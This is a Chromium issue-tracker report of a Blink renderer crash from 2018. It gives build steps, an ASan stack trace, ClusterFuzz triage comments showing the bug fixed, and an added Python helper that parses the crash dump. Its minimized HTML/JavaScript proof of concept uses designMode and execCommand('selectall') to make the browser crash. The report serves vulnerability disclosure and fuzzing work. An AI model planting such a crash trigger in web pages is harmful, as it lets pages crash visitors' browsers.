SelectAll can crash with fallback content in OBJECT
Reported by cdsrc2...@gmail.com, Apr 19 2018
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce the problem:
Chrome version: Version 68.0.3398.0 (Developer Build) (64-bit)
Ubuntu version: 16.04
signal 11 SEGV_MAPERR 000000000011 in third_party/blink/renderer/core/dom/node.h
1. Get a new version of Chrome:
   a) Build the source code. Configure the args.gn file as below:
      use_sanitizer_coverage = true
      is_asan = true
      is_debug = false
      enable_nacl = false
      treat_warnings_as_errors = false
      ninja -j16 -C out/chrome_asan chrome
2. Build a mini web server. I used the Python twisted module to build the web server.
   1) cp 1.html, 1.mp3, 1.1.xsl to webserver/res/
   2) python webserver/web.py
3.
   1) ./chrome http://127.0.0.1:8605/crash.html
   2) You get "signal 11 SEGV_MAPERR 000000000011"
Minimized PoC:
<object alt="my image" g2="http://127.0.0.1:8605/res/1.xsl">
</object>
<object data="http://127.0.0.1:8605/res/1.html" type="application/html">
<script>
onload = function() {
__cass__0__=document.createElement('input');
document.body.appendChild(__cass__0__);
__cass__0__.type='month';
__cass__0__=document.createElement('u');
document.designMode='on';
document.execCommand('selectall');
try { var __cass__0__ = __cass__0__.hasPointerCapture(1); } catch(e) { }};
</script>
</object>
<object data="http://127.0.0.1:8605/res/1.mp3" type="application/css" >
alt : <a content="JLl" ></a>
</object>
What is the expected behavior?
What went wrong?
Received signal 11 SEGV_MAPERR 000000000011
#0 0x557334759471 in __interceptor_backtrace /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:3980:13
#1 0x55733ba3d41e in base::debug::StackTrace::StackTrace(unsigned long) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/stack_trace_posix.cc:808:41
#2 0x55733ba3c36d in base::debug::(anonymous namespace)::StackDumpSignalHandler(int, siginfo_t*, void*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/stack_trace_posix.cc:334:3
#3 0x7f66d0ea5390 in __funlockfile ??:?
#4 0x7f66d0ea5390 in ?? ??:0
#5 0x5573459165a5 in GetFlag /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.h:869:47
#6 0x5573459165a5 in isConnected /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.h:548:0
#7 0x5573459165a5 in blink::Node::UpdateDistribution() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.cc:782:0
#8 0x557345bd23cd in blink::ComparePositions(blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&, blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/position.cc:401:28
#9 0x557345bf9d27 in blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > blink::(anonymous namespace)::ComputeAdjustedSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> >(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> >, blink::EphemeralRangeTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:51:29
#10 0x557345bf8360 in AdjustSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> > /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:572:12
#11 0x557345bf8360 in blink::SelectionAdjuster::AdjustSelectionToAvoidCrossingEditingBoundaries(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:766:0
#12 0x557345c791e1 in ComputeVisibleSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> > /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:269:7
#13 0x557345c791e1 in blink::VisibleSelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> >::CreateWithGranularity(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&, blink::TextGranularity) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:86:0
#14 0x557345c7b0b6 in Create /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:61:10
#15 0x557345c7b0b6 in blink::CreateVisibleSelection(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:70:0
#16 0x557345bfedcb in blink::SelectionEditor::UpdateCachedVisibleSelectionInFlatTreeIfNeeded() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_editor.cc:403:7
#17 0x557345bfea01 in blink::SelectionEditor::ComputeVisibleSelectionInFlatTree() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_editor.cc:86:3
#18 0x557345b4a397 in ComputeVisibleSelectionInFlatTree /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:127:29
#19 0x557345b4a397 in blink::FrameSelection::SelectionHasFocus() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:410:0
#20 0x557345b4a7ef in blink::FrameSelection::IsHidden() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:451:7
#21 0x557345b965d8 in CalcSelectionRangeAndSetSelectionState /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/layout_selection.cc:707:50
#22 0x557345b965d8 in blink::LayoutSelection::Commit() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/layout_selection.cc:779:0
#23 0x557346e5cc0a in blink::LayoutView::CommitPendingSelection() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/layout/layout_view.cc:620:39
#24 0x55734739b8ef in blink::PaintLayerCompositor::UpdateIfNeededRecursiveInternal(blink::DocumentLifecycle::LifecycleState, blink::CompositingReasonsStats&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:248:16
#25 0x55734739b75a in blink::PaintLayerCompositor::UpdateIfNeededRecursiveInternal(blink::DocumentLifecycle::LifecycleState, blink::CompositingReasonsStats&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:230:13
#26 0x55734739b05d in blink::PaintLayerCompositor::UpdateIfNeededRecursive(blink::DocumentLifecycle::LifecycleState) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:187:3
#27 0x557345fba02c in blink::LocalFrameView::UpdateLifecyclePhasesInternal(blink::DocumentLifecycle::LifecycleState) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/frame/local_frame_view.cc:3272:36
#28 0x55734729aef7 in blink::PageAnimator::UpdateAllLifecyclePhases(blink::LocalFrame&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/page/page_animator.cc:100:9
#29 0x557345d4dbae in blink::WebViewImpl::UpdateLifecycle(blink::WebWidget::LifecycleUpdate) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/exported/web_view_impl.cc:1833:3
#30 0x557349855034 in UpdateVisualState /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/render_widget.cc:1057:19
#31 0x557349855034 in non-virtual thunk to content::RenderWidget::UpdateVisualState(cc::LayerTreeHostClient::VisualStateUpdate) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/render_widget.cc:0:0
#32 0x55733ea48dc7 in cc::ProxyMain::BeginMainFrame(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >) /home/cowboy/chromium/src/out/chrome_asan_shared/../../cc/trees/proxy_main.cc:223:21
#33 0x55733ea5efde in Invoke<base::WeakPtr<cc::ProxyMain>, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:447:12
#34 0x55733ea5efde in MakeItSo<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:550:0
#35 0x55733ea5efde in void base::internal::Invoker<base::internal::BindState<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, void ()>::RunImpl<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, 0ul, 1ul>(void (cc::ProxyMain::*&&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >&&, std::__1::integer_sequence<unsigned long, 0ul, 1ul>) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:604:0
#36 0x55733ba40db9 in Run /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/callback.h:95:12
#37 0x55733ba40db9 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/task_annotator.cc:101:0
#38 0x55733a9b2028 in blink::scheduler::internal::ThreadControllerImpl::DoWork(blink::scheduler::internal::SequencedTaskSource::WorkType) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:162:21
#39 0x55733ba40db9 in Run /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/callback.h:95:12
#40 0x55733ba40db9 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/task_annotator.cc:101:0
#41 0x55733baa80c3 in base::MessageLoop::RunTask(base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:319:25
#42 0x55733baa9340 in DeferOrRunPendingTask /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:329:5
#43 0x55733baa9340 in base::MessageLoop::DoWork() /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:373:0
#44 0x55733bab18a0 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_pump_default.cc:37:31
#45 0x55733bb2ebf1 in base::RunLoop::Run() /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/run_loop.cc:130:14
#46 0x55734990ab8e in content::RendererMain(content::MainFunctionParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/renderer_main.cc:248:23
#47 0x55733afecf6d in content::ContentMainRunnerImpl::Run() /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/app/content_main_runner.cc:922:12
#48 0x55733b011af9 in service_manager::Main(service_manager::MainParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../services/service_manager/embedder/main.cc:452:29
#49 0x55733afe7bb8 in content::ContentMain(content::ContentMainParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/app/content_main.cc:19:10
#50 0x5573347e22d3 in ChromeMain /home/cowboy/chromium/src/out/chrome_asan_shared/../../chrome/app/chrome_main.cc:101:12
#51 0x7f66ca106830 in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291:0
#52 0x55733470d02a in _start ??:0:0
r8: 0000000000000010 r9: 0000000000000002 r10: 00000000000000f0 r11: 0000000000000001
r12: 0000000000000000 r13: 00007f66bf5f7400 r14: 00007f66bf5f7400 r15: 00000fecd7ebee80
di: 000055734c83d5ac si: ffffffffffffffff bp: 00007fff6ae203d0 bx: 00007fff6ae20340
dx: 0000000000000000 ax: 000055734e134c00 cx: 00000aae69c26901 sp: 00007fff6ae20340
ip: 00005573459165a5 efl: 0000000000010246 cgf: 002b000000000033 erf: 0000000000000004
trp: 000000000000000e msk: 0000000000000000 cr2: 0000000000000011
[end of stack trace]
Calling _exit(1). Core file will not be generated.
Did this work before? N/A
Chrome version: Version 68.0.3398.0 (Developer Build) (64-bit) Channel: dev
OS Version: Ubuntu 16.04
Flash Version:
Comment 1 by ClusterFuzz, Apr 19 2018:
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6158165742452736.
Comment, Apr 19 2018:
Possibly a duplicate of Issue 819549.
Comment, Apr 20 2018:
Detailed report: https://clusterfuzz.com/testcase?key=5746102687760384
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: Null-dereference READ
Crash Address: 0x000000000011
Crash State:
  blink::Node::UpdateDistribution
  blink::ComparePositions
  blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > bli
Sanitizer: address (ASAN)
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=540771:540772
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5746102687760384
See https://github.com/google/clusterfuzz-tools for more information.
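To show how the "Crash State" and "Crash Type" fields in the ClusterFuzz report are derived from the raw ASan dump in the issue description, here is an added Python triage helper; it is not ClusterFuzz's code and not part of this report. The 80-character per-frame cut, the noise-frame heuristic and the first-page null-dereference threshold are assumptions of this example that happen to reproduce the values in the comment above.

```python
import re
# Constructed excerpt of the ASan dump in this report (a subset of the page's frames, paths shortened).
CRASH_LOG = """\
Received signal 11 SEGV_MAPERR 000000000011
#0 0x557334759471 in __interceptor_backtrace .../sanitizer_common_interceptors.inc:3980:13
#2 0x55733ba3c36d in base::debug::(anonymous namespace)::StackDumpSignalHandler(int, siginfo_t*, void*) .../stack_trace_posix.cc:334:3
#4 0x7f66d0ea5390 in ?? ??:0
#6 0x5573459165a5 in isConnected .../core/dom/node.h:548:0
#7 0x5573459165a5 in blink::Node::UpdateDistribution() .../core/dom/node.cc:782:0
#8 0x557345bd23cd in blink::ComparePositions(blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&, blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) .../core/editing/position.cc:401:28
#9 0x557345bf9d27 in blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > blink::(anonymous namespace)::ComputeAdjustedSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> >(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> >, blink::EphemeralRangeTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) .../core/editing/selection_adjuster.cc:51:29
"""
FRAME_RE = re.compile(r"^#\d+\s+0x[0-9a-fA-F]+\s+in\s+(.*\S)\s+(\S+)$")
SIGNAL_RE = re.compile(r"Received signal (\d+) (\S+) ([0-9a-fA-F]+)")
STATE_WIDTH = 80  # assumption: the crash state in this report is cut at 80 chars per frame

def strip_arguments(symbol):
    """Drop the trailing parameter list; keep return type and template args."""
    if not symbol.endswith(")"):
        return symbol  # "??" or a bare inlined helper
    depth = 0
    for i in range(len(symbol) - 1, -1, -1):  # walk back to the matching "("
        depth += 1 if symbol[i] == ")" else -1 if symbol[i] == "(" else 0
        if depth == 0:
            return symbol[:i]
    return symbol

def is_noise_frame(symbol):
    """Our heuristic, not ClusterFuzz's: skip sanitizer/libc/signal plumbing and namespace-less inlined helpers."""
    return symbol.startswith(("__", "base::debug::")) or "::" not in symbol

def crash_state(log, depth=3):
    """First `depth` meaningful frames: the key a fuzzing pipeline dedups on."""
    frames = []
    for line in log.splitlines():
        m = FRAME_RE.match(line)
        if m and not is_noise_frame(strip_arguments(m.group(1))):
            frames.append(strip_arguments(m.group(1))[:STATE_WIDTH])
        if len(frames) == depth:
            break
    return frames

def crash_type(log):
    """Faults inside the first page are classified as null dereferences (null plus a field offset)."""
    m = SIGNAL_RE.search(log)
    if not m:
        return None
    address = int(m.group(3), 16)
    return ("Null-dereference" if address < 0x1000 else "SEGV", address)
```

Run against the dump above it yields the same three-frame state and 0x11 crash address that ClusterFuzz reported, which is why the second ClusterFuzz run (key 5746102687760384) could be matched to the reporter's original testcase.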
Comment, Jul 19:
ClusterFuzz has detected this issue as fixed in range 575974:575975.
Detailed report: https://clusterfuzz.com/testcase?key=5746102687760384
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: Null-dereference READ
Crash Address: 0x000000000011
Crash State:
  blink::Node::UpdateDistribution
  blink::ComparePositions
  blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > bli
Sanitizer: address (ASAN)
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=540771:540772
Fixed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=575974:575975
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5746102687760384
See https://github.com/google/clusterfuzz-tools for more information.
If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
Comment by Sheriffbot, Aug 9:
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot